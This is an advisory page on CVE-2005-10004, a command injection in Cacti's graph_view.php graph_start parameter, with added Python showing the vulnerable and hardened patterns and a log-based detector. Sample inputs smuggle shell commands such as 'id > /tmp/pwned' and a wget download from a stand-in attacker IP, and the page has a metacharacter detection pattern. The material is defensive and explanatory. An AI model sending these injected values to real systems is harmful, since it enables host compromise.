Cyber Resilience

CVE-2005-10004

Severity: High · Public PoC · RCE

Published: 30 August 2025
Modified: 26 December 2025
KEV Added: not listed
Patch: upgrade to Cacti 0.8.6-d or later
CVSS Score (v4.0): 8.7 High, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.5798 (98.2nd percentile)
Risk Priority: 52 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2005-10004 is a high-severity OS Command Injection (CWE-78) vulnerability in Cacti, the Cacti network graphing application. Its CVSS v4.0 base score is 8.7 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 1.8% of CVEs by EPSS exploit likelihood, is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

Cacti versions prior to 0.8.6-d contain a remote command execution vulnerability in the graph_view.php script, classified as CWE-78 (OS Command Injection). The flaw stems from improper handling of the graph_start GET parameter during graph rendering: the value reaches a shell command line without validation, so shell metacharacters in it inject arbitrary commands. Under CVSS v3.1 the vulnerability scores 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), High, reflecting full confidentiality, integrity, and availability impact.

Exploitation requires an authenticated user with low privileges (PR:L), but is otherwise remote over the network, low complexity, and needs no user interaction. Successful exploitation executes arbitrary commands on the underlying operating system with the privileges of the web server process, which can lead to full compromise of the host. The blast radius is bounded by that account's permissions, which is why least privilege for the web server process appears among the mitigating controls below.
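To make the mechanism concrete, here is an added example, not Cacti's code and not from the original page, that models the two halves of the story in Python: an rrdtool command line built by string concatenation from the graph_start parameter, which is the shape of the CWE-78 flaw, beside the hardened form that validates the parameter as an integer and passes it as a separate argv element so no shell is involved. The function names, the rrdtool command line and the sample values are hypothetical stand-ins for what graph_view.php builds.

```python
"""Model of the graph_start command-injection pattern and its fix.

Illustration added to this page, not Cacti's code: function names,
variable names and the rrdtool command line are hypothetical stand-ins
for what graph_view.php builds. Written in Python to keep the mechanics
visible; the same vulnerable and hardened shapes exist in PHP
(shell_exec on a concatenated string vs. escapeshellarg / proc_open).
"""
import re
import subprocess
from typing import List

# A legitimate graph_start is a Unix timestamp or a relative offset such as
# -86400: an optional minus sign and digits, nothing else.
_GRAPH_START = re.compile(r"-?\d{1,12}")


def build_rrdtool_cmd_vulnerable(rrd_path: str, graph_start: str) -> str:
    """Vulnerable pattern: the raw request parameter is pasted into a shell string.

    Once this string is handed to /bin/sh (PHP shell_exec, Python
    subprocess with shell=True, ...), a ';' or '|' inside graph_start ends
    the rrdtool command and starts an attacker-controlled one.
    """
    return (f"rrdtool graph - --start {graph_start} "
            f"DEF:a={rrd_path}:ds0:AVERAGE LINE1:a#ff0000")


def is_valid_graph_start(value: str) -> bool:
    """Allow-list check (NIST SI-10): the whole value must be an integer.

    fullmatch rather than match() with '$' matters: '$' would accept a
    trailing newline, and a newline is itself a command separator to a shell.
    """
    return _GRAPH_START.fullmatch(value) is not None


def build_rrdtool_argv(rrd_path: str, graph_start: str) -> List[str]:
    """Hardened pattern: validate, then pass the value as its own argv element."""
    if not is_valid_graph_start(graph_start):
        raise ValueError(f"graph_start rejected: {graph_start!r}")
    return [
        "rrdtool", "graph", "-",
        "--start", str(int(graph_start)),
        f"DEF:a={rrd_path}:ds0:AVERAGE",
        "LINE1:a#ff0000",
    ]


def render_graph(rrd_path: str, graph_start: str) -> bytes:
    """Execute without a shell: argv elements can never become commands.

    Needs rrdtool on PATH; the demo below does not call it.
    """
    return subprocess.run(build_rrdtool_argv(rrd_path, graph_start),
                          check=True, capture_output=True).stdout


def shell_words(cmd: str) -> List[str]:
    """What /bin/sh would run: split on the simple separators ';', '|', '&'.

    Demo helper only; a real shell has more separators ($(), backticks,
    newlines), which is exactly why filtering characters is a losing game.
    """
    return [part.strip() for part in re.split(r"[;|&]+", cmd) if part.strip()]


if __name__ == "__main__":
    rrd = "/var/lib/cacti/rra/router_traffic_1.rrd"
    benign = "-86400"                      # last 24 hours, as the Cacti UI sends it
    malicious = "-86400; id > /tmp/pwned"  # constructed attacker value

    for cmd in shell_words(build_rrdtool_cmd_vulnerable(rrd, malicious)):
        print("shell would run:", cmd)
    print("hardened argv:", build_rrdtool_argv(rrd, benign))
    try:
        build_rrdtool_argv(rrd, malicious)
    except ValueError as exc:
        print("blocked:", exc)
```

The design point is that the hardened version never tries to strip or escape metacharacters; it rejects anything that is not an integer and then avoids the shell altogether, so there is no second chance for an encoding trick to reintroduce a separator.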

References point to upgrading to Cacti 0.8.6-d or later as the fix, per the official download pages. Public exploit code exists: a Metasploit module (unix/webapp/cacti_graphimage_exec) and Exploit-DB entries 16881 and 9911. Exploit availability is not the same as observed in-the-wild exploitation, however; the CVE is not in the CISA KEV catalog.

Although the flaw dates from 2005, the CVE identifier was only assigned in 2025, a reminder that legacy Cacti deployments with documented public exploits remain at risk.


Vulnerability details

Cacti versions prior to 0.8.6-d contain a remote command execution vulnerability in the graph_view.php script. An authenticated user can inject arbitrary shell commands via the graph_start GET parameter, which is improperly handled during graph rendering. This flaw allows attackers to execute commands on the underlying operating system with the privileges of the web server process, potentially compromising system integrity.

CWE(s)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1190 Exploit Public-Facing Application (Initial Access): Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell (Execution): Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Direct OS command injection (CWE-78) in a web app enables remote exploitation of a public-facing application (T1190) and Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1
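Because T1190 against this flaw leaves the payload in the query string, the web server access log is the cheapest detection point. The following added example, not from the page and not part of Cacti, scans Apache-style combined log lines for graph_view.php requests whose graph_start value is not a plain integer after URL-decoding, which is the only form the Cacti UI itself sends. The log lines, IP addresses, timestamps and function names are constructed for the demonstration; the list of target scripts is a tunable assumption.

```python
"""Detect graph_start command-injection attempts in web server access logs.

Added example, not part of the page or of Cacti. Assumes Apache/nginx
"combined" log format with the request line as "METHOD target HTTP/x".
Any request to a graph script whose graph_start is not an optionally
negative integer after decoding is flagged; benign Cacti traffic never
looks like that.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TARGET_SCRIPTS = {"graph_view.php"}        # assumption: extend for other scripts
PLAIN_INT = re.compile(r"-?\d{1,12}")
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target: str) -> Optional[Dict[str, str]]:
    """Return a finding for a suspicious graph_view.php request, else None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] not in TARGET_SCRIPTS:
        return None
    # parse_qs decodes once; unquote again so %253B (double-encoded ';')
    # is seen as the separator the application would eventually receive.
    qs = parse_qs(parts.query, keep_blank_values=True)
    for raw in qs.get("graph_start", []):
        value = unquote(raw)
        if PLAIN_INT.fullmatch(value):
            continue
        return {
            "script": parts.path,
            "graph_start": value,
            "reason": "shell metacharacter" if SHELL_META.search(value) else "non-integer",
        }
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify_request over every parseable line and collect findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        hit = classify_request(rec["target"])
        if hit:
            hit.update(ip=rec["ip"], ts=rec["ts"], status=rec["status"])
            findings.append(hit)
    return findings


# Constructed sample traffic, not captured from a real host.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Aug/2025:10:00:01 +0000] "GET /cacti/graph_view.php?action=preview&graph_start=-86400&graph_end=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Aug/2025:10:00:07 +0000] "GET /cacti/graph_view.php?action=preview&graph_start=-86400%3Bid%3E/tmp/o HTTP/1.1" 200 311',
    '203.0.113.9 - - [30/Aug/2025:10:00:09 +0000] "GET /cacti/graph_view.php?action=preview&graph_start=-86400%257Cwget%2520http://203.0.113.9/x HTTP/1.1" 200 311',
    '10.0.0.7 - - [30/Aug/2025:10:01:00 +0000] "GET /cacti/index.php HTTP/1.1" 200 2048',
    '10.0.0.5 - - [30/Aug/2025:10:02:00 +0000] "GET /cacti/graph_view.php?action=tree&graph_start=abc HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['script']} graph_start={f['graph_start']!r} ({f['reason']})")
```

In production, feed the function real log lines (for example from stdin or a log shipper) and alert on any finding whose status is 200, since a successful response to an injected graph_start means the command most likely ran.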

CVEs Like This One

CVE-2025-22604 · Same product: Cacti
CVE-2025-26520 · Same product: Cacti
CVE-2024-54146 · Same product: Cacti
CVE-2025-66399 · Same product: Cacti
CVE-2024-54145 · Same product: Cacti
CVE-2025-24367 · Same product: Cacti
CVE-2025-24368 · Same product: Cacti
CVE-2026-42454 · Shared CWE-78
CVE-2026-34796 · Shared CWE-78
CVE-2026-40111 · Shared CWE-78

Affected Assets

cacti (vendor) / cacti (product): ≤ 0.8.6d

Note the discrepancy: the asset range as listed includes 0.8.6d, while the vulnerability text names 0.8.6-d as the fixed release. Treat anything below 0.8.6d as vulnerable and verify the exact installed version on hosts reporting 0.8.6d.

Mitigating Controls (NIST 800-53 r5, AI-generated mapping)

SI-2 Flaw Remediation (prevent)

Directly mitigates the vulnerability by requiring timely remediation: patch or upgrade Cacti to version 0.8.6-d or later, where the command injection flaw is fixed.

SI-10 Information Input Validation (prevent)

Prevents OS command injection by validating the graph_start GET parameter in graph_view.php before it is used: accept only an integer (allow-list) rather than attempting to strip shell metacharacters, and invoke the graph renderer without a shell.

AC-6 Least Privilege (prevent)

Limits the damage from successful RCE by running the web server process, under whose privileges injected commands execute, with the minimum permissions it needs.
